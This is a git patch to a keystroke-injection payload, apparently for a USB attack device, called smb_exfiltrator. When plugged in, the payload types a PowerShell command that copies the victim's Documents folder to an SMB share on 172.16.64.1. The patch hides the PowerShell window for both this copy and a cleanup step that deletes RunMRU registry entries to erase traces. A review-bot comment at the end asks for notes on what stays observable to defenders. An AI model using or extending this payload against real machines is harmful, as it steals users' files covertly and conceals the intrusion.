From 2978c85d6a821d5ad5581ef596adae85485093b5 Mon Sep 17 00:00:00 2001
From: Surreal
Date: Wed, 22 Mar 2017 16:13:32 -0400
Subject: [PATCH] Updated smb_exfiltrator to be more hidden Modified -WindowStyle to be hidden instead of minimized
---
 payloads/library/smb_exfiltrator/payload.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt
index 06310fa0..850bfa80 100644
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -40,7 +40,7 @@ LED R G
 ATTACKMODE HID
 QUACK GUI r
 QUACK DELAY 500
-QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
 QUACK ENTER
 # Clear tracks?
@@ -48,7 +48,7 @@ if [ $CLEARTRACKS == "yes" ]; then
 QUACK DELAY 500
 QUACK GUI r
 QUACK DELAY 500
- QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+ QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
 QUACK ENTER
 fi
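Review bot: Both hunks switch to `-WindowStyle Hidden` (the exfiltration loop and the RunMRU cleanup) without documenting what stays observable on the host, so anyone running this payload to validate monitoring has no stated expectation to check against. A comment above the first `QUACK STRING` would record it, for example `# Observable on target: powershell.exe started with -WindowStyle Hidden, SMB session to 172.16.64.1 as guest, robocopy of the Documents folder`. The cleanup line deserves its own, such as `# Only removes RunMRU values; process-creation and PowerShell logging, where enabled, still record both commands`. The script begins and ends outside these hunks, so its header may already cover part of this.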